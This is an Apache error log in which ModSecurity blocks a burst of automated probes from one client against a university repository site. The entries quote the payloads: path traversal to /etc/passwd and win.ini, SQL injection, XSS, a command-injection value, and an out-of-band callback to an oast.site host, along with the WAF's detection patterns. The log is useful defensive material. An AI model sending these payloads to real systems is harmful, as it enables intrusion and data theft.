[Tue Aug 29 11:40:05.515667 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAcPivQAAAAa"]
[Tue Aug 29 11:40:07.389145 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAXYiZwAAAAG"]
[Tue Aug 29 11:40:07.403180 2023] [:error] [pid 1699] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAaj7CAAAAAq"]
[Tue Aug 29 11:40:12.427300 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcXk2YAAAAe"]
[Tue Aug 29 11:40:22.408006 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcjAhkAAAAw"]
[Tue Aug 29 11:40:22.653074 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcaVMcAAAAu"]
[Tue Aug 29 11:40:32.404851 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaJJ6EAAAAJ"]
[Tue Aug 29 11:40:33.367365 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcoNL4AAAAF"]
[Tue Aug 29 11:40:36.419281 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWRUAAAAR"]
[Tue Aug 29 11:40:37.419637 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAQSWm4AAAA0"]
[Tue Aug 29 11:40:39.382894 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcYU3EAAAAp"]
[Tue Aug 29 11:40:40.385759 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcjAkEAAAAw"]
[Tue Aug 29 11:40:44.450148 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcYU4YAAAAp"]
[Tue Aug 29 11:40:44.626647 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAaZ9jkAAAAo"]
[Tue Aug 29 11:40:46.472686 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJREAAAAB"]
[Tue Aug 29 11:40:50.380727 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcoNNUAAAAF"]
[Tue Aug 29 11:40:50.428355 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcqJE0AAAAG"]
[Tue Aug 29 11:40:53.895665 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbFAAAAAH"]
[Tue Aug 29 11:40:55.477426 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAYf-KMAAAAD"]
[Tue Aug 29 11:40:58.395863 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcqJGIAAAAG"]
[Tue Aug 29 11:40:58.461640 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcjAl4AAAAw"]
[Tue Aug 29 11:40:59.355976 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggsyyymt11961q.oast.site found within TX:1: cjmnbitjmimt14dgn26ggsyyymt11961q.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcbSBUAAAAv"]
[Tue Aug 29 11:40:59.380201 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO1228Co-f0AAAYMWTMAAAAR"]
[Tue Aug 29 11:41:00.381301 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcYU7UAAAAp"]
[Tue Aug 29 11:41:00.391348 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAActbFkAAAAH"]
[Tue Aug 29 11:41:00.426641 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcvBc0AAAAJ"]
[Tue Aug 29 11:41:00.445944 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123MCo-f0AAAYMWToAAAAR"]
[Tue Aug 29 11:41:01.434194 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcYU7oAAAAp"]
[Tue Aug 29 11:41:01.571308 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcYU70AAAAp"]
[Tue Aug 29 11:41:01.622224 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAaZ9mAAAAAo"]
